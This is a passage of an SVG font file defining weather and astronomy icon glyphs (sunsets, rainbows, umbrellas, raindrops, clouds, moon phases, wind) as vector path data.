<glyph unicode="&#xeb11;" glyph-name="sunset4" d="M704.212 320c0.475 5.27 0.717 10.607 0.717 16 0 97.202-78.798 176-176 176s-176-78.798-176-176c0-5.393 0.243-10.73 0.717-16h350.565zM528.93 640c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM744.548 550.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM833.859 335.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM224 335.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0zM313.312 550.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0zM241.192 256c-8.982 0-16.263-7.422-16.263-16v0c0-8.837 7.252-16 16.263-16h575.475c8.982 0 16.263 7.422 16.263 16v0c0 8.837-7.252 16-16.263 16h-575.475z" />
<glyph unicode="&#xeb12;" glyph-name="sunset5" d="M697.375 352c-20.894 73.872-88.813 128-169.375 128s-148.481-54.128-169.375-128h33.569c19.768 55.929 73.108 96 135.806 96s116.038-40.071 135.806-96h33.569zM528 608c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM743.618 518.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM312.382 518.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0zM240.263 288c-8.982 0-16.263-7.422-16.263-16v0c0-8.837 7.252-16 16.263-16h575.475c8.982 0 16.263 7.422 16.263 16v0c0 8.837-7.252 16-16.263 16h-575.475z" />
<glyph unicode="&#xeb13;" glyph-name="sunset6" d="M697.375 352c-20.894 73.872-88.813 128-169.375 128s-148.481-54.128-169.375-128h338.75zM528 608c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM743.618 518.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM312.382 518.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0zM240.263 288c-8.982 0-16.263-7.422-16.263-16v0c0-8.837 7.252-16 16.263-16h575.475c8.982 0 16.263 7.422 16.263 16v0c0 8.837-7.252 16-16.263 16h-575.475z" />
<glyph unicode="&#xeb14;" glyph-name="rainbow" d="M512 608c276.277 0 501.444-218.823 511.64-492.607 0.236-1.094 0.36-2.229 0.36-3.393 0-8.837-7.163-16-16-16s-16 7.163-16 16c-8.701 257.69-220.258 464-480 464s-471.299-206.31-479.738-464c-0.262-8.837-7.425-16-16.262-16s-16 7.163-16 16c0 1.164 0.124 2.299 0.36 3.393 10.195 273.784 235.363 492.607 511.64 492.607v0zM512 544c240.831 0 437.277-190.030 447.576-428.324 0.278-1.18 0.424-2.411 0.424-3.676 0-8.837-7.163-16-16-16s-16 7.163-16 16c-8.71 222.336-191.607 400-416 400s-407.29-177.664-415.698-400c-0.302-8.837-7.465-16-16.302-16s-16 7.163-16 16c0 1.265 0.147 2.496 0.424 3.676 10.298 238.294 206.745 428.324 447.576 428.324v0zM512 480c205.356 0 373.063-161.199 383.486-363.962 0.335-1.29 0.514-2.643 0.514-4.038 0-8.837-7.163-16-16-16s-16 7.163-16 16c-8.722 186.978-162.958 336-352 336s-343.278-149.022-351.643-336c-0.357-8.837-7.521-16-16.357-16s-16 7.163-16 16c0 1.395 0.178 2.748 0.514 4.038 10.423 202.764 178.13 363.962 383.486 363.962v0zM16.085 64c-8.883 0-16.085-7.422-16.085-16 0-8.837 7.086-16 16.085-16h991.831c8.883 0 16.085 7.422 16.085 16 0 8.837-7.086 16-16.085 16h-991.831zM896 560c0 97.202-78.798 176-176 176-69.3 0-129.245-40.053-157.95-98.272 11.477-1.047 22.852-2.45 34.112-4.199 25.109 42.197 71.172 70.471 123.838 70.471 79.529 0 144-64.471 144-144 0-15.199-2.355-29.848-6.719-43.602 8.848-7.275 17.462-14.825 25.83-22.635 8.311 20.446 12.89 42.807 12.89 66.237v0zM704 848.148v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852-8.837 0-16-6.904-16-15.852v0zM913.095 774.792l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523-6.248 6.248-16.196 6.432-22.523 0.104v0zM1009.077 575.070h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16v0zM504.278 752.165l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104-6.248-6.248-6.432-16.196-0.104-22.523v0z" />
<glyph unicode="&#xeb15;" glyph-name="rainbow2" d="M512 608c276.277 0 501.444-218.823 511.64-492.607 0.236-1.094 0.36-2.229 0.36-3.393 0-8.837-7.163-16-16-16s-16 7.163-16 16c-8.701 257.69-220.258 464-480 464s-471.299-206.31-479.738-464c-0.262-8.837-7.425-16-16.262-16s-16 7.163-16 16c0 1.164 0.124 2.299 0.36 3.393 10.195 273.784 235.363 492.607 511.64 492.607v0zM512 544c240.831 0 437.277-190.030 447.576-428.324 0.278-1.18 0.424-2.411 0.424-3.676 0-8.837-7.163-16-16-16s-16 7.163-16 16c-8.71 222.336-191.607 400-416 400s-407.29-177.664-415.698-400c-0.302-8.837-7.465-16-16.302-16s-16 7.163-16 16c0 1.265 0.147 2.496 0.424 3.676 10.298 238.294 206.745 428.324 447.576 428.324v0zM512 480c205.356 0 373.063-161.199 383.486-363.962 0.335-1.29 0.514-2.643 0.514-4.038 0-8.837-7.163-16-16-16s-16 7.163-16 16c-8.722 186.978-162.958 336-352 336s-343.278-149.022-351.643-336c-0.357-8.837-7.521-16-16.357-16s-16 7.163-16 16c0 1.395 0.178 2.748 0.514 4.038 10.423 202.764 178.13 363.962 383.486 363.962v0zM16.085 64c-8.883 0-16.085-7.422-16.085-16 0-8.837 7.086-16 16.085-16h991.831c8.883 0 16.085 7.422 16.085 16 0 8.837-7.086 16-16.085 16h-991.831zM896 560c0 97.202-78.798 176-176 176-69.3 0-129.245-40.053-157.95-98.272 123.628-11.277 235.3-63.918 321.060-143.965 8.311 20.446 12.89 42.807 12.89 66.237v0zM704 848.148v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852-8.837 0-16-6.904-16-15.852v0zM913.095 774.792l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523-6.248 6.248-16.196 6.432-22.523 0.104v0zM1009.077 575.070h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16v0zM504.278 752.165l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104-6.248-6.248-6.432-16.196-0.104-22.523v0z" />
<glyph unicode="&#xeb16;" glyph-name="umbrella" d="M944 576c44.183 0 80-28.654 80-64 0 173.277-213.472 314.387-480 319.837v48.183c0 8.826-7.422 15.98-16 15.98-8.837 0-16-6.916-16-15.98v-48.183c-266.528-5.449-480-146.559-480-319.837 0 35.346 35.817 64 80 64s80-28.654 80-64c0 35.346 35.817 64 80 64s80-28.654 80-64c0 35.346 35.817 64 80 64s80-28.654 80-64v-448.295c0-17.274-14.327-31.705-32-31.705-17.796 0-32 14.195-32 31.705v48.145c0 8.919-7.422 16.15-16 16.15-8.837 0-16-6.849-16-16.15v-47.817c0-35.365 28.407-64.033 64-64.033 35.346 0 64 28.407 64 64v448c0 35.346 35.817 64 80 64s80-28.654 80-64c0 35.346 35.817 64 80 64s80-28.654 80-64c0 35.346 35.817 64 80 64v0zM512 579.186c-20.328 17.781-48.661 28.814-80 28.814-28.608 0-54.71-9.193-74.506-24.321v0c18.19 116.206 79.577 204.098 154.506 215.147v-219.64zM544 579.186v219.64c74.928-11.049 136.315-98.941 154.506-215.147-19.796 15.128-45.898 24.321-74.506 24.321-31.339 0-59.672-11.033-80-28.814zM327.164 595.567c-16.283 7.914-35.108 12.433-55.164 12.433-25.623 0-49.237-7.375-68.108-19.784v0c29.361 91.943 110.55 165.53 214.975 196.252-44.434-42.214-77.766-109.434-91.702-188.901v0 0zM728.836 595.567v0 0c-13.936 79.467-47.269 146.687-91.702 188.901 104.425-30.723 185.614-104.309 214.975-196.252-18.872 12.409-42.485 19.784-68.108 19.784-20.056 0-38.881-4.519-55.164-12.433zM171.927 593.117c-17.329 9.425-37.884 14.883-59.927 14.883-7.78 0-15.375-0.68-22.709-1.974 37.069 66.646 112.447 122.207 209.795 156.543-61.348-42.436-106.758-101.549-127.159-169.452v0 0zM756.914 762.569c97.348-34.336 172.725-89.898 209.795-156.543-7.333 1.294-14.928 1.974-22.709 1.974-22.043 0-42.598-5.458-59.927-14.883-20.401 67.904-65.811 127.017-127.159 169.452v0 0z" />
<glyph unicode="&#xeb17;" glyph-name="umbrella2" d="M864 512h160c0 35.346-35.817 64-80 64s-80-28.654-80-64v0zM864 512c0 35.346-35.817 64-80 64s-80-28.654-80-64c0 35.346-35.817 64-80 64s-80-28.654-80-64v0-448c0-35.593-28.654-64-64-64-35.593 0-64 28.669-64 64.033v47.817c0 9.301 7.163 16.15 16 16.15 8.578 0 16-7.231 16-16.15v-48.145c0-17.51 14.204-31.705 32-31.705 17.673 0 32 14.431 32 31.705v448.295c0 35.346-35.817 64-80 64s-80-28.654-80-64c0 35.346-35.817 64-80 64s-80-28.654-80-64c0 35.346-35.817 64-80 64s-80-28.654-80-64c0 173.277 213.472 314.387 480 319.837v48.183c0 9.064 7.163 15.98 16 15.98 8.578 0 16-7.155 16-15.98v-48.183c266.528-5.449 480-146.559 480-319.837h-160z" />
<glyph unicode="&#xeb18;" glyph-name="raindrops" d="M288 592v0c0-41.6 26.682-80 80.337-80s79.663 41.6 79.663 80c0 53.895-79.663 144-79.663 144s-80.337-90.105-80.337-144zM608 464v0c0-41.6 26.682-80 80.337-80s79.663 41.6 79.663 80c0 53.895-79.663 144-79.663 144s-80.337-90.105-80.337-144zM384 208v0c0-41.6 26.682-80 80.337-80s79.663 41.6 79.663 80c0 53.895-79.663 144-79.663 144s-80.337-90.105-80.337-144zM640 464c0 32 48.337 92.8 48.337 92.8s47.663-60.8 47.663-92.8c0-38.4-26.008-48-47.663-48s-48.337 9.6-48.337 48v0zM320 592c0 32 48.337 92.8 48.337 92.8s47.663-60.8 47.663-92.8c0-38.4-26.008-48-47.663-48s-48.337 9.6-48.337 48v0zM416 208c0 32 48.337 92.8 48.337 92.8s47.663-60.8 47.663-92.8c0-38.4-26.008-48-47.663-48s-48.337 9.6-48.337 48v0z" />
<glyph unicode="&#xeb19;" glyph-name="raindrops2" d="M288 592c0 53.895 80.337 144 80.337 144s79.663-90.105 79.663-144c0-38.4-26.008-80-79.663-80s-80.337 38.4-80.337 80v0zM608 464c0 53.895 80.337 144 80.337 144s79.663-90.105 79.663-144c0-38.4-26.008-80-79.663-80s-80.337 38.4-80.337 80v0zM384 208c0 53.895 80.337 144 80.337 144s79.663-90.105 79.663-144c0-38.4-26.008-80-79.663-80s-80.337 38.4-80.337 80v0z" />
<glyph unicode="&#xeb1a;" glyph-name="raindrop" d="M384 377.263v0c0-66.972 57.308-121.263 128-121.263s128 54.291 128 121.263c0 80.842-128 262.737-128 262.737s-128-181.895-128-262.737zM416 377.263c0 54.737 96 205.137 96 205.137s96-150.4 96-205.137c0-57.263-57.308-89.263-96-89.263s-96 32-96 89.263v0z" />
<glyph unicode="&#xeb1b;" glyph-name="raindrop2" d="M384 377.263c0 80.842 128 262.737 128 262.737s128-181.895 128-262.737c0-66.972-57.308-121.263-128-121.263s-128 54.291-128 121.263z" />
<glyph unicode="&#xeb1c;" glyph-name="sunglasses" d="M576.32 481.042h351.227c0.952-11.374 0.256-22.693-0.736-32h-346.91c-2.762 10.019-4.693 21.284-3.582 32zM595.487 513.042c3.782 2.44 8.223 4.572 13.414 6.323 57.274 19.318 116.244 24.555 148.434 25.427s123.67 0.401 148.532-17.509c5.391-3.883 9.545-8.753 12.717-14.241h-323.097zM431.663 417.042c-3.287-9.137-8.869-20.713-15.804-32v0h-304.892c-3.464 9.606-6.495 21.12-8.719 32h329.416zM442.94 449.042h-345.524c-0.995 9.314-1.681 20.646-0.664 32h349.644c1.234-10.691-0.68-21.971-3.456-32zM389.979 353.042c-1.607-1.379-3.226-2.649-4.85-3.794-21.107-14.875-67.477-26.736-125.758-26.736-33.844 0-61.317 1.592-88.362 7.677-19.335 4.35-31.728 8.355-43.032 22.853h262.002zM425.757 513.042h-319.538c3.079 5.014 7.033 9.47 12.071 13.068 24.758 17.68 115.855 18.145 147.91 17.284s90.779-6.031 147.813-25.102c4.448-1.487 8.343-3.253 11.743-5.251zM913.456 385.042h-306.806c-6.84 11.324-12.331 22.884-15.558 32h330.935c-2.188-10.845-5.165-22.332-8.571-32zM896.954 353.042c-11.574-15.566-24.146-19.711-44.027-24.223-27.159-6.164-54.747-7.777-88.733-7.777-58.525 0-105.091 12.015-126.286 27.083-2.041 1.451-4.074 3.101-6.086 4.917h265.132zM481.888 544.786c-139.756 38.513-336.804 36.714-438.171 19.633-12.241-2.063-14.162-58.331-3.276-60.299 20.035-8.102 28.583-28.322 28.583-28.322s5.982-17.941 23.356-90.905c17.373-72.964 58.791-81.713 58.791-81.713s50.693-12.544 109.171-12.544c58.478 0 93.459 2.659 130.91 21.391s53.819 70.904 53.819 70.904c0 0 18.869 44.955 31.86 87.374 4.074 13.302 66.066 13.302 70.14 0 12.991-42.418 31.86-87.374 31.86-87.374s16.369-52.171 53.819-70.904c37.451-18.733 72.432-21.391 130.91-21.391s109.171 12.544 109.171 12.544c0 0 41.418 8.749 58.791 81.713s23.356 90.905 23.356 90.905c0 0 8.548 20.219 28.583 28.322 10.886 1.969 8.965 58.237-3.276 60.299-101.367 17.081-298.416 18.88-438.171-19.633-9.484-2.172-50.741-2.172-60.225 0v0z" />
<glyph unicode="&#xeb1d;" glyph-name="sunglasses2" d="M480.591 544.786c-139.756 38.513-336.804 36.714-438.171 19.633-12.241-2.063-14.162-58.331-3.276-60.299 20.035-8.102 28.583-28.322 28.583-28.322s5.982-17.941 23.356-90.905c17.373-72.964 58.791-81.713 58.791-81.713s50.693-12.544 109.171-12.544c58.478 0 93.459 2.659 130.91 21.391s53.819 70.904 53.819 70.904c0 0 18.869 44.955 31.86 87.374 4.074 13.302 66.066 13.302 70.14 0 12.991-42.418 31.86-87.374 31.86-87.374s16.369-52.171 53.819-70.904c37.451-18.733 72.432-21.391 130.91-21.391s109.171 12.544 109.171 12.544c0 0 41.418 8.749 58.791 81.713s23.356 90.905 23.356 90.905c0 0 8.548 20.219 28.583 28.322 10.886 1.969 8.965 58.237-3.276 60.299-101.367 17.081-298.416 18.88-438.171-19.633-9.484-2.172-50.741-2.172-60.225 0z" />
<glyph unicode="&#xeb1e;" glyph-name="stars" d="M408.32 459.52l-40.32-107.52-40.32 107.52-71.68 20.48 71.68 20.48 40.32 107.52 40.32-107.52 71.68-20.48-71.68-20.48zM726.857 664.381l-38.857 103.619-38.857-103.619-73.143-24.381 73.143-24.381 38.857-103.619 38.857 103.619 73.143 24.381-73.143 24.381zM662.857 280.381l-38.857 103.619-38.857-103.619-73.143-24.381 73.143-24.381 38.857-103.619 38.857 103.619 73.143 24.381-73.143 24.381zM430.703 528.432l-62.703 175.568-62.703-175.568-145.297-48.432 145.297-48.432 62.703-175.568 62.703 175.568 145.297 48.432-145.297 48.432z" />
<glyph unicode="&#xeb1f;" glyph-name="stars2" d="M726.857 664.381l-38.857 103.619-38.857-103.619-73.143-24.381 73.143-24.381 38.857-103.619 38.857 103.619 73.143 24.381-73.143 24.381zM662.857 280.381l-38.857 103.619-38.857-103.619-73.143-24.381 73.143-24.381 38.857-103.619 38.857 103.619 73.143 24.381-73.143 24.381zM430.703 528.432l-62.703 175.568-62.703-175.568-145.297-48.432 145.297-48.432 62.703-175.568 62.703 175.568 145.297 48.432-145.297 48.432z" />
<glyph unicode="&#xeb20;" glyph-name="clouds3" d="M832.070 320v0 0c20.060-26.741 31.93-59.981 31.93-96 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 24.023 0 47.162-3.782 68.856-10.782 16.405 61.489 72.485 106.782 139.144 106.782 24.846 0 48.222-6.292 68.621-17.37 27.464 48.579 79.592 81.37 139.379 81.37 88.366 0 160-71.634 160-160 0-12.079-1.339-23.846-3.876-35.16 57.18-12.931 99.876-64.018 99.876-124.84 0-70.692-57.611-128-128.306-128h-31.624zM800.103 352h64.083c52.828 0 95.814 42.981 95.814 96 0 52.911-42.898 96-95.814 96h-17.31c10.891 18.827 17.124 40.686 17.124 64 0 70.692-57.308 128-128 128-61.326 0-112.578-43.127-125.084-100.707-20.488 22.549-50.049 36.707-82.916 36.707-53.234 0-97.793-37.139-109.181-86.92 31.989-15.75 59.673-38.909 80.814-67.237 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265 11.475-5.002 22.245-11.309 32.124-18.735v0 0zM32 224c0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273 0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269-56.845-13.107-99.232-64.079-99.232-124.731v0z" />
<glyph unicode="&#xeb21;" glyph-name="clouds4" d="M870.219 320.163c67.68 3.397 121.781 59.332 121.781 127.837 0 60.821-42.696 111.908-99.876 124.84 2.537 11.314 3.876 23.081 3.876 35.16 0 88.366-71.634 160-160 160-59.787 0-111.914-32.792-139.379-81.37-20.4 11.078-43.776 17.37-68.621 17.37-55.31 0-103.336-31.183-127.458-76.927 41.378-13.703 78.077-37.677 107.077-68.901 25.789 11.46 54.342 17.828 84.382 17.828 107.089 0 195.276-80.928 206.739-184.963 29.654-16.855 54.38-41.379 71.48-70.874v0 0zM864 224c0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265 56.585-24.664 96.021-81.082 96.021-146.735v0z" />
<glyph unicode="&#xeb22;" glyph-name="moonrise" d="M626.099 330.163c27.468 23.41 47.65 55.116 56.668 91.242 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-61.403 31.444-115.462 79.109-146.952l25.192 22.043c-43.208 24.855-72.301 71.485-72.301 124.909 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-9.064-25.748-25.239-48.145-46.169-64.831l24.401-21.351zM240.263 256c-8.982 0-16.263-7.422-16.263-16 0-8.837 7.252-16 16.263-16h194.404l93.333 80 93.333-80h194.404c8.982 0 16.263 7.422 16.263 16 0 8.837-7.252 16-16.263 16h-175.737l-112 96-112-96h-175.737z" />
<glyph unicode="&#xeb23;" glyph-name="moonrise2" d="M618.843 338.135c23.004 22.425 39.892 51.095 47.925 83.271 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-64.736 34.95-121.308 87.011-151.878l120.989 103.705 90.843-77.865zM240.263 256c-8.982 0-16.263-7.422-16.263-16 0-8.837 7.252-16 16.263-16h194.404l93.333 80 93.333-80h194.404c8.982 0 16.263 7.422 16.263 16 0 8.837-7.252 16-16.263 16h-175.737l-112 96-112-96h-175.737z" />
<glyph unicode="&#xeb24;" glyph-name="moonset" d="M682.768 485.405v0c2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-97.202 78.798-176 176-176 82.452 0 151.662 56.698 170.768 133.232zM368 528.173c0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-19.719-56.019-73.104-96.173-135.867-96.173-79.529 0-144 64.471-144 144v0zM240.263 256c-8.982 0-16.263 7.422-16.263 16 0 8.837 7.252 16 16.263 16h194.404l93.333-80 93.333 80h194.404c8.982 0 16.263-7.422 16.263-16 0-8.837-7.252-16-16.263-16h-175.737l-112-96-112 96h-175.737z" />
<glyph unicode="&#xeb25;" glyph-name="moonset2" d="M681.838 469.405c-19.106-76.535-88.316-133.232-170.768-133.232-97.202 0-176 78.798-176 176 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901v0zM240.263 256c-8.982 0-16.263 7.422-16.263 16 0 8.837 7.252 16 16.263 16h194.404l93.333-80 93.333 80h194.404c8.982 0 16.263-7.422 16.263-16 0-8.837-7.252-16-16.263-16h-175.737l-112-96-112 96h-175.737z" />
<glyph unicode="&#xeb26;" glyph-name="wind" d="M960 512c0 70.692-57.451 128-128 128-70.692 0-128-57.261-128-128h32c0 53.019 43.089 96 96 96 53.019 0 96-43.089 96-96 0-53.019-42.98-96-96.254-96h-735.746v-32h736.049c70.665 0 127.951 57.451 127.951 128v0zM672 544c0 53.019-43.089 96-96 96-53.019 0-96-42.946-96-95.725v-0.275h32c0 35.346 28.407 64 64 64 35.346 0 64-28.407 64-64 0-35.346-28.706-64-64.187-64h-383.813v-32h384.018c53.009 0 95.982 43.089 95.982 96v0zM800 288c0-35.346-28.407-64-64-64v0c-35.346 0-64 28.631-64 63.816v0.184h32c0-17.673 14.204-32 32-32v0c17.673 0 32 14.204 32 32v0c0 17.673-14.365 32-32.239 32h-447.761v32h448.19c35.241 0 63.81-28.407 63.81-64v0 0z" />
<glyph unicode="&#xeb27;" glyph-name="wind2" d="M960 512c0 70.692-57.451 128-128 128-70.692 0-128-57.261-128-128h64c0 35.346 28.407 64 64 64 35.346 0 64-28.407 64-64 0-35.346-28.472-64-64.115-64h-735.885v-64h736.049c70.665 0 127.951 57.451 127.951 128v0zM672 640c0 70.692-57.451 128-128 128-70.692 0-128-57.261-128-127.907v-0.093h64c0 35.346 28.407 64 64 64 35.346 0 64-28.407 64-64 0-35.346-28.706-64-64.187-64h-383.813v-64h384.122c70.625 0 127.878 57.451 127.878 128v0zM832 224c0-53.019-43.089-96-96-96v0c-53.019 0-96 42.946-96 95.725v0.275h64c0-17.673 14.204-32 32-32v0c17.673 0 32 14.204 32 32v0c0 17.673-14.365 32-32.239 32h-447.761v64h447.996c53.022 0 96.004-43.089 96.004-96v0 0z" />
<glyph unicode="&#xeb28;" glyph-name="full-moon" d="M512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb29;" glyph-name="full-moon2" d="M704 448c0-106.039-85.961-192-192-192s-192 85.961-192 192c0 106.039 85.961 192 192 192s192-85.961 192-192z" />
<glyph unicode="&#xeb2a;" glyph-name="crescent" d="M512 608h0.019c-0.006 0-0.013 0-0.019 0-53.019 0-96-71.634-96-160s42.981-160 96-160c-88.366 0-160 71.634-160 160s71.634 160 160 160zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb2b;" glyph-name="crescent2" d="M544 324.033c-10.228-2.632-20.95-4.033-32-4.033-70.692 0-128 57.308-128 128s57.308 128 128 128c11.050 0 21.772-1.4 32-4.033-55.207-14.209-96-64.325-96-123.967s40.793-109.758 96-123.967v0zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb2c;" glyph-name="half-moon" d="M512 256v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM512 288v320c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeb2d;" glyph-name="half-moon2" d="M512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0zM384 448c0 70.692 57.308 128 128 128v-256c-70.692 0-128 57.308-128 128v0z" />
<glyph unicode="&#xeb2e;" glyph-name="gibbous-moon" d="M512 608v0c53.019 0 96-71.634 96-160s-42.981-160-96-160c-88.366 0-160 71.634-160 160s71.634 160 160 160zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb2f;" glyph-name="gibbous-moon2" d="M512 576v0c35.346 0 64-57.308 64-128s-28.654-128-64-128c-70.692 0-128 57.308-128 128s57.308 128 128 128zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb30;" glyph-name="moon3" d="M512 256v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM512 288c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeb31;" glyph-name="moon4" d="M512 256v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM512 320c70.692 0 128 57.308 128 128s-57.308 128-128 128c-70.692 0-128-57.308-128-128s57.308-128 128-128v0z" />
<glyph unicode="&#xeb32;" glyph-name="gibbous-moon3" d="M512 608v0c-53.019 0-96-71.634-96-160s42.981-160 96-160c88.366 0 160 71.634 160 160s-71.634 160-160 160zM512 256c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192v0z" />
<glyph unicode="&#xeb33;" glyph-name="gibbous-moon4" d="M512 576c70.692 0 128-57.308 128-128s-57.308-128-128-128c-35.346 0-64 57.308-64 128s28.654 128 64 128v0zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb34;" glyph-name="half-moon3" d="M512 256v0c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192zM512 288v320c88.366 0 160-71.634 160-160s-71.634-160-160-160v0z" />
<glyph unicode="&#xeb35;" glyph-name="half-moon4" d="M512 256v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM640 448c0 70.692-57.308 128-128 128v-256c70.692 0 128 57.308 128 128v0z" />
